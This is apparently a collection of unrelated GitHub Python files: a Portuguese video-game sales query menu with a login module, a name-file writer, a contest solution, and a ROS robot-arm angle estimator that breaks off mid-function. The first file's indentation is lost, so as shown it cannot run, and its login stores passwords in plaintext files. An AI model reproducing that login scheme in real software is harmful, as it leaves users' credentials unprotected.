def ler(arquivo,ano,gen,intervalo,reg,busca):
A=[]
x=[]
y=[]
yy=[]
z=[]
zz=[]
arq = open( user +'.txt', 'r')
for linha in arq:
A = linha.split('|')
if A[0]== arquivo and busca != 6:
x = A[1].split(',')
yy = A[2].split(',')
for i in range(len(yy)):
y.append(float(yy[i]))
arq.close()
if busca == 1:
graphics(x,y,ano)
print('Você utilizou dados já pesquisados')
return(1)
if busca == 2:
graphics2(x,y,ano,gen)
print('Você utilizou dados já pesquisados')
return(1)
if busca == 3:
graphics3(x,y,reg)
print('Você utilizou dados já pesquisados')
return(1)
if busca == 4:
graphics4(y,x,gen)
print('Você utilizou dados já pesquisados')
return(1)
if busca == 5:
graphics5(y,x,gen,intervalo)
print('Você utilizou dados já pesquisados')
return(1)
if busca == 13:
zz = A[3].split(',')
for i in range(20):
z.append(float(zz[i]))
a = intervalo.split('-')
ano1 = str(a[0])
ano2 = str(a[1])
graphics13(x,y,z,gen,intervalo)
print('Você utilizou dados já pesquisados')
return(1)
if A[0]== arquivo and busca == 6:
xano=[]
B = A[4].split(',')
for i in range(len(B)):
xano.append(int(B[i]))
qgen=int(A[3])
an1=int(A[5])
an2=int(A[6])
graphics6(A[2],A[1],xano, qgen, an1, an2)
print('Você utilizou dados já pesquisados')
return(1)
arq.close()
return(0)
def escrever (valor):
arq = open(user+'.txt', 'a')
arq.write(valor)
arq.close()
def hist():
z=[]
print('_'*80)
arq = open(user +'.txt', 'r')
for linha in arq:
if linha[0:1] == '1' or linha[0:1] == '2':
print('HISTÓRICO:\n')
else:
z=linha.split('|')
print(z[0])
arq.close()
#--------------------------------------MÓDULO DE MENU---------------------------------------------------------
def start(x):
print('_'*80)
print('1- Fazer buscas')
print('2- Meu histórico')
print('3- Sair')
print('_'*80)
op=input('Digite a opção correspondente\n')
if op == '1':
if x =='1':
menu_1()
else:
menu_2()
if op == '2':
hist()
if op == '3':
return()
return start(x)
def menu_1():
print('_'*80)
print('\t\t\t\tBUSCAS')
print('-'*80)
print('1: Média global de vendas por gênero de jogos que \n\tforam lançados em um determinado ano.')
print('-'*80)
print('2: Quais as 10 empresas que mais publicaram em um determinado\n\t ano, usando um determinado gênero')
print('-'*80)
print('3: Top 10 média de vendas por plataforma para uma determinada região.')
print('-'*80)
print('4: Média de vendas de acordo com um determinado gênero dos jogos \n\tvendidos em NA, EU, JP, Outros e global.')
print('-'*80)
print('5: Média das Vendas globais por ano,baseadas em um determinado intervalo\n\tde anos e um gênero.')
print('-'*80)
print('6: Quantidade de jogos de acordo com os “X” maiores gênero em um\n\t intervalo de anos.')
print('-'*80)
print('13: Média global de vendas por gênero de jogos que \n\tforam lançados em um determinado ano.')
print('_'*80)
op=input('Digite a opção que deseja buscar ["0" para retornar ao menu inicial]\n')
if op=='0':#------------------------------------------------------------------------
return
if op=='1':#-----------------------------------------------------------------------
ano=input('Digite o ano que deseja visualizar\n')
try:
ano = int(ano)
except:
print('Ano inválido!')
return menu_1()
if ano < 1980 or ano > 2020:
print('Ano inválido!')
return menu_1()
x = ler('busca_1,Ano:'+str(ano),str(ano),0,0,0,1) #arquivo,ano,genero,intervalo,regiao,busca
if x == 0 :
busca_1(str(ano),'0','0')
return menu_1()
if op=='2':#---------------------------------------------------------------------###
ano= input('Digite o ano que deseja visualizar\n')
try:
ano = int(ano)
except:
print ('Ano inválido!')
return menu_1()
if ano < 1980 or ano > 2020:
print('Ano inválido!')
return menu_1()
print('-'*80)
print('-'*80)
print('Escolha o gênero:')
print('-'*80)
gen = input('1-Action\n2-Role-Playing\n3-Shooter\n4-Platform\n5-Sports\n6-Simulation\n7-Fighting\n8-Misc\n9-Adventure\n10-Racing\n11-Puzzle\n12-Strategy\n')
try:
gen=int(gen)
except:
print('Opção inválida!')
return menu_1()
if gen < 0 or gen > 12:
print('Opção inválida!')
return menu_1()
if gen == 1:
gen='Action'
if gen == 2:
gen='Role-Playing'
if gen == 3 :
gen='Shooter'
if gen == 4 :
gen='Platform'
if gen == 5:
gen='Sports'
if gen == 6 :
gen='Simulation'
if gen == 7 :
gen='Fighting'
if gen == 8 :
gen='Misc'
if gen == 9 :
gen='Adventure'
if gen == 10 :
gen='Racing'
if gen == 11 :
gen='Puzzle'
if gen == 12 :
gen='Strategy'
if gen == 0:
return menu_1()
x=ler('busca_2,Ano:'+str(ano)+',Gênero:'+str(gen),str(ano),str(gen),0,0,2)#arquivo,ano,genero,intervalo,regiao,busca
if x == 0 :
busca_2(str(ano),gen)
return menu_1()
if op=='3':#--------------------------------------------------------------------
print('Regiões:\n1- NA\n2- EU\n3- JP\n4- Other\n')
regiao=input('Digite a região que deseja visualizar\n')
try:
regiao=int(regiao)
except:
print('Opção inválida!')
return menu_1()
regiao+=5
r=regiao
if regiao < 6 or regiao > 9:
print('Opção inválida!')
return menu_1()
if regiao == 6:
regiao = 'NA'
if regiao == 7:
regiao = 'EU'
if regiao == 8:
regiao = 'JP'
if regiao == 9:
regiao = 'Other'
x=ler('busca_3,Região:'+regiao,0,0,0,regiao,3) #arquivo,ano,genero,intervalo,regiao
if x == 0:
busca_3(r)
return menu_1()
if op=='4':#--------------------------------------------------------------------
print('-'*80)
print('Escolha o gênero: \t["0" para retornar ao menu inicial]')
print('-'*80)
gen=input('1-Action\n2-Role-Playing\n3-Shooter\n4-Platform\n5-Sports\n6-Simulation\n7-Fighting\n8-Misc\n9-Adventure\n10-Racing\n11-Puzzle\n12-Strategy\n')
try:
gen=int(gen)
except:
print('Opção inválida!')
return menu_1()
if gen < 0 or gen > 12:
print('Opção inválida!')
return menu_1()
if gen == 1:
gen='Action'
if gen == 2:
gen='Role-Playing'
if gen == 3 :
gen='Shooter'
if gen == 4 :
gen='Platform'
if gen == 5:
gen='Sports'
if gen == 6 :
gen='Simulation'
if gen == 7 :
gen='Fighting'
if gen == 8 :
gen='Misc'
if gen == 9 :
gen='Adventure'
if gen == 10 :
gen='Racing'
if gen == 11 :
gen='Puzzle'
if gen == 12 :
gen='Strategy'
if gen == 0 :
return menu_1()
x=ler('busca_4,Gênero:'+gen,0,gen,0,0,4)
if x == 0:
busca_4(gen)
return menu_1()
if op=='5':#--------------------------------------------------------------------
print('_'*80)
anoA =input('Digite o primeiro ano do intervalo\t["0"para sair]\n')
try:
anoA=int(anoA)
except:
print('Opção inválida!')
return menu_1()
if anoA == 0:
return menu_1()
anoB =input('Digite o segundo ano do intervalo\t["0"para sair]\n')
try:
anoB=int(anoB)
except:
print('Opção inválida!')
return menu_1()
if anoB == 0:
return menu_1()
if anoA > anoB:
a = 0
a = anoB
anoB = anoA
anoA = a
if anoA < 1980 or anoB > 2020:
print('Intervalo inválido.')
return menu_1()
print('-'*80)
print('Escolha o gênero:')
print('-'*80)
gen=input('1-Action\n2-Role-Playing\n3-Shooter\n4-Platform\n5-Sports\n6-Simulation\n7-Fighting\n8-Misc\n9-Adventure\n10-Racing\n11-Puzzle\n12-Strategy\n')
try:
gen = int(gen)
except:
print('Opção inválida!')
return menu_1()
if gen < 0 or gen > 12:
print('Opção inválida!')
return menu_1()
if gen ==1:
gen='Action'
if gen ==2:
gen='Role-Playing'
if gen ==3:
gen='Shooter'
if gen ==4:
gen='Platform'
if gen ==5:
gen='Sports'
if gen ==6:
gen='Simulation'
if gen ==7:
gen='Fighting'
if gen ==8:
gen='Misc'
if gen ==9:
gen='Adventure'
if gen ==10:
gen='Racing'
if gen ==11:
gen='Puzzle'
if gen == 12:
gen='Strategy'
if gen == 0 :
return()
intervalo=(str(anoA)+'-'+str(anoB))
x = ler('busca_5,Gênero:'+str(gen)+',Intervalo:'+str(intervalo),0,str(gen),intervalo,0,5) #arquivo,ano,genero,intervalo,regiao,busca
if x == 0:
busca_5(anoA,anoB,gen,intervalo)
return menu_1()
if op=='6':#--------------------------------------------------------------------
print('_'*80)
anoA =input('Digite o primeiro ano do intervalo\t["0"para sair]\n')
if anoA == 0:
return()
try:
anoA = int(anoA)
except:
print('Ano inválido!')
return menu_1()
anoB =input('Digite o segundo ano do intervalo\t["0"para sair]\n')
if anoB == 0:
return()
try:
anoB = int(anoB)
except:
print('Ano inválido!')
return menu_1()
if anoA > anoB:
a = 0
a = anoB
anoB = anoA
anoA = a
if anoA < 1980 or anoB > 2020:
print('Intervalo inválido!')
return menu_1()
qgen =input('Digite a quantidade de gêneros que deseja visualizar [1 a 12] \t["0"para sair]\n')
try:
qgen = int(qgen)
except:
print('Opção inválida!')
if qgen < 1 or qgen > 12:
print('Número inválido!')
return menu_1()
intervalo=(str(anoA)+'-'+str(anoB))
x = ler('busca_6,Gêneros:'+str(qgen)+',Intervalo:'+str(intervalo),0,0,intervalo,0,6) #arquivo,ano,genero,intervalo,regiao,busca
if x == 0:
busca_6(anoA,anoB,qgen)
return menu_1()
if op=='13':#-------------------------------------------------------------------
print('_'*80)
anoA = input('Digite o primeiro ano do intervalo\t["0"para sair]\n')
if anoA == 0:
return menu_1()
try:
anoA = int(anoA)
except:
print('Ano inválido')
return menu_1()
anoB = input('Digite o segundo ano do intervalo\t["0"para sair]\n')
if anoB == 0:
return menu_1()
try:
anoB = int(anoB)
except:
print('Ano inválido!')
return menu_1()
if anoA < 1980 or anoA > 2020 or anoB < 1980 or anoB > 2020:
print('Intervalo indisponível!')
return menu_1()
print('-'*80)
if anoB == 0:
return menu_1()
if anoA > anoB:
a = 0
a = anoB
anoB = anoA
anoA = a
print('-'*80)
print('Escolha o gênero:')
print('-'*80)
gen=input('1-Action\n2-Role-Playing\n3-Shooter\n4-Platform\n5-Sports\n6-Simulation\n7-Fighting\n8-Misc\n9-Adventure\n10-Racing\n11-Puzzle\n12-Strategy\n')
try:
gen = int(gen)
except:
print('Opção inválida!')
return menu_1()
if gen < 0 or gen > 12:
print('Opção inválida!')
return menu_1()
if gen == 1:
gen='Action'
if gen == 2:
gen='Role-Playing'
if gen == 3 :
gen='Shooter'
if gen == 4 :
gen='Platform'
if gen == 5:
gen='Sports'
if gen == 6 :
gen='Simulation'
if gen == 7 :
gen='Fighting'
if gen == 8 :
gen='Misc'
if gen == 9 :
gen='Adventure'
if gen == 10 :
gen='Racing'
if gen == 11 :
gen='Puzzle'
if gen == 12 :
gen='Strategy'
if gen == 0 :
return()
intervalo=(str(anoA)+'-'+str(anoB))
x = ler('busca_13,Gênero:'+str(gen)+',Intervalo:'+str(intervalo),0,str(gen),intervalo,0,13) #arquivo,ano,genero,intervalo,regiao,busca
if x == 0:
busca_13(anoA,anoB,gen)
return menu_1()
return menu_1()
def menu_2():
print('_'*80)
print('\t\t\t\tBUSCAS')
print('-'*80)
print('1: Média global de vendas por gênero de jogos que \n\tforam lançados em um determinado ano.\n')
print('-'*80)
print('2: Quais as 10 empresas que mais publicaram em um determinado\n\t ano, usando um determinado gênero\n')
print('-'*80)
print('5: Média das Vendas globais por ano,baseadas em um determinado intervalo\n\tde anos e um gênero.\n')
print('-'*80)
print('13: Média global de vendas por gênero de jogos que \n\tforam lançados em um determinado ano.\n')
print('_'*80)
op=input('Digite a opção que deseja buscar ["0" para retornar ao menu inicial]\n')
if op=='0':#----------------------------------------------------------------------------------
return()
if op=='1':#----------------------------------------------------------------------------------
ano=input('Digite o ano que deseja visualizar\n')
try:
ano =int(ano)
except:
print('Ano inválido!')
return menu_2()
if ano < 1980 or ano > 2020:
print('Ano indisponível!')
return menu_2()
x = ler('busca_1,Ano:'+str(ano),str(ano),0,0,0,1) #arquivo,ano,genero,intervalo,regiao,busca
if x == 0 :
busca_1(str(ano),'0','0')
return menu_2()
if op=='2':#---------------------------------------------------------------------------------
ano= input('Digite o ano que deseja visualizar\n')
try:
ano=int(ano)
except:
print('Ano inválido!')
return menu_2()
if ano < 1980 or ano > 2020:
print('Ano indisponível')
return menu_2()
print('-'*80)
print('-'*80)
print('Escolha o gênero:')
print('-'*80)
gen=input('1-Action\n2-Role-Playing\n3-Shooter\n4-Platform\n5-Sports\n6-Simulation\n7-Fighting\n8-Misc\n9-Adventure\n10-Racing\n11-Puzzle\n12-Strategy\n')
try:
gen = int(gen)
except:
print('Opção inválida!')
return menu_2()
if gen < 0 or gen > 12:
print('Opção inválida!')
return menu_2()
if gen == 1:
gen='Action'
if gen == 2:
gen='Role-Playing'
if gen == 3 :
gen='Shooter'
if gen == 4 :
gen='Platform'
if gen == 5:
gen='Sports'
if gen == 6 :
gen='Simulation'
if gen == 7 :
gen='Fighting'
if gen == 8 :
gen='Misc'
if gen == 9 :
gen='Adventure'
if gen == 10 :
gen='Racing'
if gen == 11 :
gen='Puzzle'
if gen == 12 :
gen='Strategy'
if gen == 0 :
return()
x=ler('busca_2,Ano:'+str(ano)+',Gênero:'+str(gen),str(ano),str(gen),0,0,2)#arquivo,ano,genero,intervalo,regiao,busca
if x == 0 :
busca_2(str(ano),gen)
return menu_2()
if op=='5':#--------------------------------------------------------------------------------
print('_'*80)
anoA =input('Digite o primeiro ano do intervalo\t["0"para sair]\n')
try:
anoA=int(anoA)
except:
print('Opção inválida!')
return menu_2()
if anoA == 0:
return menu_2()
anoB =input('Digite o segundo ano do intervalo\t["0"para sair]\n')
try:
anoB=int(anoB)
except:
print('Opção inválida!')
return menu_2()
if anoB == 0:
return menu_2()
if anoA > anoB:
a = 0
a = anoB
anoB = anoA
anoA = a
if anoA < 1980 or anoB > 2020:
print('Intervalo inválido.')
return menu_2()
print('-'*80)
print('Escolha o gênero:')
print('-'*80)
gen=input('1-Action\n2-Role-Playing\n3-Shooter\n4-Platform\n5-Sports\n6-Simulation\n7-Fighting\n8-Misc\n9-Adventure\n10-Racing\n11-Puzzle\n12-Strategy\n')
try:
gen = int(gen)
except:
print('Opção inválida!')
return menu_2()
if gen < 0 or gen > 12:
print('Opção inválida!')
return menu_2()
if gen == 1:
gen='Action'
if gen == 2:
gen='Role-Playing'
if gen == 3 :
gen='Shooter'
if gen == 4 :
gen='Platform'
if gen == 5:
gen='Sports'
if gen == 6 :
gen='Simulation'
if gen == 7 :
gen='Fighting'
if gen == 8 :
gen='Misc'
if gen == 9 :
gen='Adventure'
if gen == 10 :
gen='Racing'
if gen == 11 :
gen='Puzzle'
if gen == 12 :
gen='Strategy'
if gen == 0 :
return menu_2()
intervalo=(str(anoA)+'-'+str(anoB))
x = ler('busca_5,Gênero:'+str(gen)+',Intervalo:'+str(intervalo),0,str(gen),intervalo,0,5) #arquivo,ano,genero,intervalo,regiao,busca
if x == 0:
busca_5(anoA,anoB,gen,intervalo)
return menu_2()
if op=='13':#-------------------------------------------------------------------------------
print('_'*80)
anoA = input('Digite o primeiro ano do intervalo\t["0"para sair]\n')
if anoA == 0:
return menu_2()
try:
anoA = int(anoA)
except:
print('Ano inválido')
return menu_2()
anoB = input('Digite o segundo ano do intervalo\t["0"para sair]\n')
if anoB == 0:
return menu_2()
try:
anoB = int(anoB)
except:
print('Ano inválido!')
return menu_2()
if anoA < 1980 or anoA > 2020 or anoB < 1980 or anoB > 2020:
print('Intervalo indisponível!')
return menu_2()
print('-'*80)
if anoB == 0:
return menu_2()
if anoA > anoB:
a = 0
a = anoB
anoB = anoA
anoA = a
print('-'*80)
print('Escolha o gênero:')
print('-'*80)
gen=input('1-Action\n2-Role-Playing\n3-Shooter\n4-Platform\n5-Sports\n6-Simulation\n7-Fighting\n8-Misc\n9-Adventure\n10-Racing\n11-Puzzle\n12-Strategy\n')
try:
gen = int(gen)
except:
print('Opção inválida!')
return menu_2()
if gen < 0 or gen > 12:
print('Opção inválida!')
return menu_2()
if gen == 1:
gen='Action'
if gen == 2:
gen='Role-Playing'
if gen == 3 :
gen='Shooter'
if gen == 4 :
gen='Platform'
if gen == 5:
gen='Sports'
if gen == 6 :
gen='Simulation'
if gen == 7 :
gen='Fighting'
if gen == 8 :
gen='Misc'
if gen == 9 :
gen='Adventure'
if gen == 10 :
gen='Racing'
if gen == 11 :
gen='Puzzle'
if gen == 12 :
gen='Strategy'
if gen == 0 :
return()
intervalo=(str(anoA)+'-'+str(anoB))
x = ler('busca_13,Gênero:'+str(gen)+',Intervalo:'+str(intervalo),0,str(gen),intervalo,0,13) #arquivo,ano,genero,intervalo,regiao,busca
if x == 0:
busca_13(anoA,anoB,gen)
return menu_2()
else:
print('Opção inválida!')
return menu_2()
#-------------------------------------------------------MÓDULO DE SENHAS-----------------------
def login():
def autenticador(x,y,operação):
if operação=='login':
if os.path.isfile(x +'.txt'):
if y !='y':
arq = open(x +'.txt', 'r')
for linha in arq:
tipo = linha[0:1]
if tipo == '1':
password = linha[1:len(linha)-1]
if password == y:
arq.close()
return ('Gerente')
if tipo == '2':
password = linha[1:len(linha)-1]
if password == y:
arq.close()
return ('Funcionário')
arq.close()
return('0')#senha
else: #nome
return('0')
if operação=='new':
if os.path.isfile(x +'.txt'):
print('Usuário já existe!')
return()
else:
arq = open(x +'.txt', 'a')
arq.close()
arq = open(x +'.txt', 'a')
arq.write(y+'\n')
arq.close()
print('Usuário Cadastrado!')
return()
print('_'*80)
print ('1-Para para fazer Login\n')
print ('2-Para criar um Novo Usuário')
print('_'*80)
x=input()
print('_'*80)
if x == '2': #novo usuário----------------------------------------------------------------
print('\t\t\t\tNovo Usuário:')
user=input('Usuário:\n')
user=user.upper()
if user == '':
print('Usuário inválido!')
return login()
password=input('Senha:\n')
if password == '':
print('Senha inválida!')
return login()
tipo=input('Digite tipo de usuário:\n1-Gerente\n2-Funcionário\n')
if tipo == '1' or tipo =='2':
password = tipo+password #
autenticador(user,password,'new')
return login()
else:
print('Opção inválida!')
return login()
if x == '1':#login-------------------------------------------------------------------------
print('\t\t\t\tFazer login:')
user=input('Usuário:\n')
user=user.upper()
w=autenticador(user,'y','login')
if w =='0':
print('\tNome de usuário incorreto!, por favor tente novamente:\n')
return login()
password=input('Senha:\n')
z=autenticador(user,password,'login')
if z == '0':
print('Senha incorreta!tente novamente')
return login()
return(user,z)
else:
print('Opção inválida!')
return login()
#_start_____________________________________________________________________________________________
global user
print('\n\t\t\t\tBem Vindo(a)!')
user,tipo=login()
print('_'*80)
print('Conectado como:\t-{0}-\t[{1}]'.format(user,tipo))
print('_'*80)
if tipo =='Gerente':
start('1')
else:
start ('0')
| michloliveira/Projeto-IP_2018--Python | P-version 3.8.1/P-version 3.8.1.py | P-version 3.8.1.py | py | 47,013 | python | pt | code | 0 | github-code | 90 |
44355280626 | #adding next 3 friends due to input func
def main():
print('Adding next 3 friends due to function input.')
name4 = input('Name #4:')
name5 = input('Name #5:')
name6= input('Name #6:')
file = open('names.txt', 'a')
file.write(name4 + '\n')
file.write(name5 + '\n')
file.write(name6 + '\n')
file.write('Johny B\n')
file.write('David G\n')
file.write('Gorge.H\n')
file.close()
read_file()
def read_file():
file = open('names.txt', 'r')
print('Here you have all names saved to the file names.txt')
print(file.read())
main() | PythonProfessional83/operations_on_files_exceptions | adding_names_tofile.py | adding_names_tofile.py | py | 588 | python | en | code | 0 | github-code | 90 |
17952691299 | import sys
readline = sys.stdin.readline
# A + Bの組み合わせはせいぜい1~30のうち作れる数字のみなので全探索
A,B,C,D,E,F = map(int,readline().split())
ans = [0,0]
maxrate = 0.0
for a in range(0,F,100 * A):
for b in range(0,F,100 * B):
if a == 0 and b == 0:
continue
if a + b > F:
break
water = a + b
# waterに対して溶ける最大量は (a + b) * E
limit = min(((a + b) // 100) * E, F - water)
maxsugar = 0
for c in range(0,limit + 1,C):
for d in range(0,limit + 1,D):
if c + d > limit:
break
if c + d > maxsugar:
maxsugar = c + d
rate = maxsugar / (water + maxsugar)
if rate > maxrate:
maxrate = rate
ans = [water + maxsugar, maxsugar]
if maxrate == 0.0:
print(min(A,B) * 100, 0)
exit(0)
print(*ans) | Aasthaengg/IBMdataset | Python_codes/p03599/s950595895.py | s950595895.py | py | 868 | python | en | code | 0 | github-code | 90 |
25901310278 | #!/usr/bin/env python3
import image1
import image2
import target_detector
import roslib
import sys
import rospy
import cv2
import numpy as np
import message_filters
from math import pi
from math import atan2
from std_msgs.msg import String
from sensor_msgs.msg import Image
from std_msgs.msg import Float64MultiArray, Float64
from cv_bridge import CvBridge, CvBridgeError
from sympy import symbols, Matrix, cos, sin
import sympy
class angle_estimator:
def __init__(self):
rospy.init_node('angle_estimator', anonymous=True)
self.robot_joint2_estimated_pub = rospy.Publisher("/robot/joint2_position_estimator/command", Float64, queue_size=10)
self.robot_joint3_estimated_pub = rospy.Publisher("/robot/joint3_position_estimator/command", Float64, queue_size=10)
self.robot_joint4_estimated_pub = rospy.Publisher("/robot/joint4_position_estimator/command", Float64, queue_size=10)
self.robot_joint1_pub = rospy.Publisher("/robot/joint1_position_controller/command", Float64, queue_size=10)
self.robot_joint2_pub = rospy.Publisher("/robot/joint2_position_controller/command", Float64, queue_size=10)
self.robot_joint3_pub = rospy.Publisher("/robot/joint3_position_controller/command", Float64, queue_size=10)
self.robot_joint4_pub = rospy.Publisher("/robot/joint4_position_controller/command", Float64, queue_size=10)
self.ee_pos_x = rospy.Publisher("/robot/ee_x/command", Float64, queue_size=10)
self.ee_pos_y = rospy.Publisher("/robot/ee_y/command", Float64, queue_size=10)
self.ee_pos_z = rospy.Publisher("/robot/ee_z/command", Float64, queue_size=10)
self.image_sub1 = message_filters.Subscriber("/camera1/robot/image_raw", Image)
self.image_sub2 = message_filters.Subscriber("/camera2/robot/image_raw", Image)
self.ts = message_filters.ApproximateTimeSynchronizer([self.image_sub1, self.image_sub2], 10, 1, allow_headerless=True)
self.ts.registerCallback(self.callback)
self.blue = np.array([0,0,0])
self.green = np.array([0,0,0])
self.red = np.array([0,0,0])
self.time_trajectory = rospy.get_time()
self.time_previous_step = np.array([rospy.get_time()], dtype='float64')
self.time_previous_step2 = np.array([rospy.get_time()], dtype='float64')
self.oldq = np.array([0,0,0,0])
self.error = np.array([0.0,0.0,0.0], dtype='float64')
self.error_d = np.array([0.0,0.0,0.0], dtype='float64')
self.bridge = CvBridge()
self.fkmatrix = Matrix([0])
self.fkjacobian = Matrix([0])
self.symThetas = []
self.targetXpos = 0
self.targetYpos = 0
self.targetZpos = 0
self.lastYZPosition = np.array([0,0])
self.lastXZPosition = np.array([0,0])
self.joint2 = message_filters.Subscriber("/robot/joint2_position_controller/command", Float64)
self.joint3 = message_filters.Subscriber("/robot/joint3_position_controller/command", Float64)
self.joint4 = message_filters.Subscriber("/robot/joint4_position_controller/command", Float64)
self.jointmf = message_filters.ApproximateTimeSynchronizer([self.joint2, self.joint3, self.joint4], 10, 1, allow_headerless=True)
self.jointmf.registerCallback(self.jointscallback)
self.actualJoints = np.array([0,0,0,0])
def detect3dyellow(self, img1, img2):
a1 = image1.pixel2meter(img1)
a2 = image1.pixel2meter(img2)
yellowYZ = a1*image1.detect_yellow(img1)
yellowXZ = a2*image2.detect_yellow(img2)
xyz = np.array([yellowXZ[0], yellowYZ[0], (yellowYZ[1]+yellowXZ[1])/2])
return xyz
def detect3dred(self, img1, img2):
a1 = image1.pixel2meter(img1)
a2 = image1.pixel2meter(img2)
redYZ = a1 *image1.detect_red(img1)
redXZ = a2 *image2.detect_red(img2)
xyz = np.array([redXZ[0], redYZ[0], (redYZ[1]+redXZ[1])/2])
if (np.array([0,0,0]) == xyz).any():
xyz = self.red
self.red = xyz
return xyz
def detect3dblue(self, img1, img2):
a1 = image1.pixel2meter(img1)
a2 = image1.pixel2meter(img2)
blueYZ = a1*image1.detect_blue(img1)
blueXZ = a2*image2.detect_blue(img2)
xyz = np.array([blueXZ[0], blueYZ[0], (blueYZ[1]+blueXZ[1])/2])
return xyz
def detect3dgreen(self, img1, img2):
a1 = image1.pixel2meter(img1)
a2 = image1.pixel2meter(img2)
greenYZ = a1 * image1.detect_green(img1)
greenXZ = a2 * image2.detect_green(img2)
xyz = np.array([greenXZ[0], greenYZ[0], (greenYZ[1]+greenXZ[1])/2])
if (np.array([0,0,0]) == xyz).any():
xyz = self.green
self.green = xyz
return xyz
def projection(self, link_vector, normal_vector):
return(link_vector - (np.dot(link_vector, normal_vector)/np.linalg.norm(normal_vector)**2)*normal_vector)
def length(self, v):
return np.sqrt(np.dot(v, v))
def vector_angle(self, u, v):
return(np.arccos(np.dot(u, v) / (np.linalg.norm(u) * np.linalg.norm(v))))
def plane_angles(self, link_vector):
proj_xz = self.projection(link_vector, np.array([0,1,0]))
proj_yz = self.projection(link_vector, np.array([1,0,0]))
proj_xy = self.projection(link_vector, np.array([0,0,1]))
#proj2 = self.projection(proj_xz, np.array([1,0,0]))
x_rotation = 0
y_rotation =0
#positive x rotation
if link_vector[1]<=0:
x_rotation = self.vector_angle(proj_yz, [0,0,-1])
if x_rotation > np.pi/2:
x_rotation = np.pi/2
#negative x rotation
else:
x_rotation = -self.vector_angle(proj_yz, [0,0,-1])
if x_rotation < -np.pi/2:
x_rotation = -np.pi/2
#if np.abs(self.lastXrot - x_rotation) > np.pi/2:
# x_rotation = self.lastXrot
self.lastXrot = x_rotation
if link_vector[0]>=0:
y_rotation = self.vector_angle(proj_yz, link_vector)
else:
y_rotation = -self.vector_angle(proj_yz, link_vector)
return(x_rotation, y_rotation)
def detect3dtarget(self, img1, img2):
a1 = image1.pixel2meter(img1)
a2 = image1.pixel2meter(img2)
targetYZ = a1*image1.detect_target(img1)
targetXZ = a2*image2.detect_target(img2)
if targetYZ[0] == 0 and targetYZ[1] == 0:
targetYZ = self.lastYZPosition
else:
self.lastYZPosition = targetYZ
if targetXZ[0] == 0 and targetXZ[1] == 0:
targetXZ = self.lastXZPosition
else:
self.lastXZPosition = targetXZ
xyz = np.array([targetXZ[0], targetYZ[0], ((targetYZ[1]+targetXZ[1])/2)])
return xyz
def jointangles(self, img1, img2):
yellow = self.detect3dyellow(img1, img2)
blue = self.detect3dblue(img1, img2)
green = self.detect3dgreen(img1, img2)
red = self.detect3dred(img1, img2)
vectYB = blue - yellow
vectBG = green - blue
vectGR = red - green
joint2and3 = self.plane_angles(vectBG)
joint_4 = self.vector_angle(vectBG, vectGR)
#print(joint_4)
#if(vectGR[1]> 0):
#joint_4 = -joint_4
return np.array([0, joint2and3[0], joint2and3[1], joint_4])
def dh_matrix(self, d, theta, alpha, r):
return(np.array([ [np.cos(theta) , -np.sin(theta)*np.cos(alpha), np.sin(theta)*np.sin(alpha) , r*np.cos(theta)],
[np.sin(theta) , np.cos(theta)*np.cos(alpha) , -np.cos(theta)*np.sin(alpha) , r*np.sin(theta)],
[0 , np.sin(alpha) , np.cos(alpha) , d],
[0 , 0 , 0 , 1]]))
def dh_matrix_sym(self, d, theta, alpha, r):
return(Matrix([ [cos(theta) , -sin(theta)*cos(alpha), sin(theta)*sin(alpha) , r*cos(theta)],
[sin(theta) , cos(theta)*cos(alpha) , -cos(theta)*sin(alpha) , r*sin(theta)],
[0 , sin(alpha) ,cos(alpha) ,d],
[0 , 0 , 0 ,1]]))
def sym_forward_kinametics(self, ds, thetas, alphas, rs):
theta0, theta1, theta2, theta3, r0, r1, r2, r3, alpha0, alpha1, alpha2, alpha3, d0, d1, d2, d3 = symbols('theta0 theta1 theta2 theta3 r0 r1 r2 r3 alpha0 alpha1 alpha2 alpha3 d0 d1 d2 d3')
matrix0 = (self.dh_matrix_sym(d0, theta0, alpha0, r0))
matrix1 = (self.dh_matrix_sym(d1, theta1, alpha1, r1))
matrix2 = (self.dh_matrix_sym(d2, theta2, alpha2, r2))
matrix3 = (self.dh_matrix_sym(d3, theta3, alpha3, r3))
finalMatrix = (((matrix0 * matrix1) * matrix2) * matrix3)
jacobian = (finalMatrix.col(3).jacobian(Matrix([theta0, theta1, theta2, theta3])))
finalMatrix = (finalMatrix.subs([(theta0 ,thetas[0]), (theta1 ,thetas[1]),(theta2 ,thetas[2]),(theta3 ,thetas[3])]))
finalMatrix = (finalMatrix.subs([(d0 ,ds[0]), (d1 ,ds[1]),(d2 ,ds[2]),(d3 ,ds[3])]))
finalMatrix = (finalMatrix.subs([(alpha0 ,alphas[0]), (alpha1, alphas[1]),(alpha2 ,alphas[2]),(alpha3 ,alphas[3])]))
finalMatrix = (finalMatrix.subs([(r0 ,rs[0]), (r1 ,rs[1]),(r2 ,rs[2]),(r3 ,rs[3])]))
jacobian = (jacobian.subs([(theta0 ,thetas[0]), (theta1 ,thetas[1]),(theta2 ,thetas[2]),(theta3 ,thetas[3])]))
jacobian = (jacobian.subs([(d0 ,ds[0]), (d1 ,ds[1]),(d2 ,ds[2]),(d3 ,ds[3])]))
jacobian = (jacobian.subs([(alpha0 ,alphas[0]), (alpha1, alphas[1]),(alpha2 ,alphas[2]),(alpha3 ,alphas[3])]))
jacobian = (jacobian.subs([(r0 ,rs[0]), (r1 ,rs[1]),(r2 ,rs[2]),(r3 ,rs[3])]))
return(finalMatrix, jacobian)
def make_matrix(self):
theta0, theta1, theta2, theta3, r0, r1, r2, r3, alpha0, alpha1, alpha2, alpha3, d0, d1, d2, d3 = symbols('theta0 theta1 theta2 theta3 r0 r1 r2 r3 alpha0 alpha1 alpha2 alpha3 d0 d1 d2 d3')
rs = [0,0,3.5,3]
alphas = np.deg2rad([-90,-90,-90,0])
ds = [2.5, 0, 0,0]
matrix0 = (self.dh_matrix_sym(d0, theta0, alpha0, r0))
matrix1 = (self.dh_matrix_sym(d1, theta1, alpha1, r1))
matrix2 = (self.dh_matrix_sym(d2, theta2, alpha2, r2))
matrix3 = (self.dh_matrix_sym(d3, theta3, alpha3, r3))
finalMatrix = (((matrix0 * matrix1) * matrix2) * matrix3)
jacobian = (finalMatrix.col(3).jacobian(Matrix([theta0, theta1, theta2, theta3])))
jacobian = (jacobian.subs([(d0 ,ds[0]), (d1 ,ds[1]),(d2 ,ds[2]),(d3 ,ds[3])]))
jacobian = (jacobian.subs([(alpha0 ,alphas[0]), (alpha1, alphas[1]),(alpha2 ,alphas[2]),(alpha3 ,alphas[3])]))
